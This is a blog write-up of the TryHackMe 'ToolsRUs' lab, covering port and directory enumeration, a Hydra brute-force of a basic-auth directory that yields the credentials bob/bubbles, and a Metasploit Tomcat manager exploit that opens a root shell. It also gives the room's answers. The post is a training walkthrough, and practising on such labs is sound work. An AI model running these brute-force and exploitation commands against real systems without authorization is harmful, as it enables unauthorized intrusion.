TryHackMe - ToolsRUs WriteUp

arturserra

Artur Serra

Posted on February 4, 2021

TryHackMe - ToolsRUs WriteUp

"Your challenge is to use the tools listed below to enumerate a server, gathering information along the way that will eventually lead to you taking over the machine.

This task requires you to use the following tools:

  • Dirbuster
  • Hydra
  • Nmap
  • Nikto
  • Metasploit"

The objective from this TryHackMe's room are explicit from the very beginning. We gotta learn how to use some core tools present in the current hacking environment, essential to push forward our methodologies in an easy, (usually) fast and automatic way. So let's start to check this room out and see if we can cover all tasks and answer all questions proposed here.

To start our Information Gathering phase, we run RustScan with docker run -it --rm --name rustscan rustscan/rustscan:1.1.0 10.10.64.71 in order to quickly find out more information about the open ports.
RustScan

Once we know which ports are open, we run a really intense nmap focusing only on those ports, with the command nmap -T4 -A -Pn -O -v -p 22,1234,80 10.10.64.71
Nmap Scan

We get to find a lot of important information with the scan, especially that it's running two web clients, one on port 80 and another one on port 1234.

  1. Port 80 Open
  2. Port 1234 Open

Since the one running on port 1234 seems to be just the default page from Apache Tomcat, let's focus on getting some more information on the "main" web client, the one running on port 80.

To start up our investigation, let's focus on the hero image on the page. It indicates that, even though the main page is down, there might be some secret directories. A common practice is to check the robots.txt file in order to find some hidden gems in a website.
Not Functional landing page

However, accessing the /robots.txt returns a default 404. Not an optimal result, but default 404 are good pieces to disclose information on what kind of web server the application is running on.
Default Apache 404

We then run a gobuster with the command
gobuster dir -u http://10.10.64.71/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 40 -x .php,.txt,.bak,.html 2>/dev/null

This will not only look for directories in our wordlist, but also for extra file extensions such as php, txt, bak and html. This is important to find hidden login screens, backup files, development files and other kind of important information we can gather in this process, which is crucial to expand our attack surface.
Gobuster Scan

Our gobuster scan returns some hidden directories, including the answer for the first question in this room:

Our gobuster scan returns some hidden directories, including the answer for the first question in this room:

  • guidelines

Accessing /guidelines, we get a message, a "developer leftover".
Developer Leftover

Whose name can you find from this directory?

  • bob

That's some valuable information, we might tackle it later.
Moving on with our discovery, we also found out about this other protected directory.
Protected Directory

This basic authentication is also the answer for the next question:

What directory has basic authentication?

  • protected

We know one of the developers is called "bob", so probably this is also a username. In order to find out about their password, we can run Hydra with the command:
hydra -l bob -P /usr/share/wordlists/rockyou.txt -t 1 -f 10.10.64.71 http-get /protected/

After just a few seconds, we get a matching result, and also the answer for the fourth question in our room.

What is bob's password to the protected part of the website?

  • bubbles

Hydra BruteForcing

When we try to log into the basic authentication, however, we find this new message, probably pointing to the other open port we found out before
Rabbit Hole

The next questions refer to something we found out about earlier in our Information Gathering phase:

What other port that serves a webs service is open on the machine?

  • 1234

Going to the service running on that port, what is the name and version of the software?

  • Apache Tomcat/7.0.88

Running a Nikto scan with nikto -h http://10.10.64.71:1234, we get to retrieve more useful information.
Nikto Scan

How many documentation files did Nikto identify?

  • 5

Going back to our default 404, we can get information on how to answer the following question

What is the server version (run the scan against port 80)?

  • Apache/2.4.18

Now, accessing the http://:1234/manager/html and logging in with bob's credentials, we get to this admin page
Apache Admin

On our nikto scan we could also get information on the Apache-Coyote, answering the next question.

What version of Apache-Coyote is this service using?

  • 1.1

Considering we are dealing with a Tomcat Manager, let's look for it on searchsploit, with a simple searchsploit tomcat manager command
Searchsploit

With all the information we gathered during this process, we are able to try to exploit the application. The first tool we are going for here is Metasploit, for two reasons: The first one is that it's a very good and versatile application, the second is reason is: With our searchsploit, we managed to find that the exploit in our system for this particular application is a .rb file, and considering that Metasploit is a Ruby-based application, most likely it's a Metasploit-ready exploit.

Diving deeper into our metasploit, we manage to find that exploit we found before on searchsploit. With that, we can set the RHOSTS to and the RPORT to 1234, as well as the HttpPassword to bubbles and HttpUsername to bob.
Metasploit

set RPORT 1234

set RHOSTS <IP>

set HttpPassword bubbles

set HttpUsername bob

set LHOST <VPN IP>

Metasploit settings

(If you don't want to exploit it using metasploit, there are some alternatives here):

Once everything is configured we can simply run the exploit with the command run (or exploit)

Metasploit Shell

And then we have a shell! Running a getuid command, we manage to know we are running it as root! Awesome!
After exploring to the root folder, we manage to find the flag and read it!
Flag!

And that's it! We managed to root the ToolsRUs machine, a quite useful way to learn about the various tools and techniques used to exploit an application! Kudos to TryHackMe for creating such a cool room for us to practice and sharpen our skills!

Some takeaways one can take from this particular room is the importance of a good information gathering phase. Most of the tools it highlights are related to this phase, that is - arguably - the most important step in the Pentest methodology. It's also good to have a nice plan B. As I also suggested, going for an alternative exploit that does not entirely depends on Metasploit is a good plan b, because sometimes meterpreter breaks or fails (or you just forgot to configure one of the important fields [like myself, not updating LHOSTS and hitting my face against the wall multiple times]).

💖 💪 🙅 🚩
arturserra
Artur Serra

Posted on February 4, 2021

Join Our Newsletter. No Spam, Only the good stuff.

Sign up to receive the latest update from our blog.

Related

TryHackMe - ToolsRUs WriteUp
cybersecurity TryHackMe - ToolsRUs WriteUp

February 4, 2021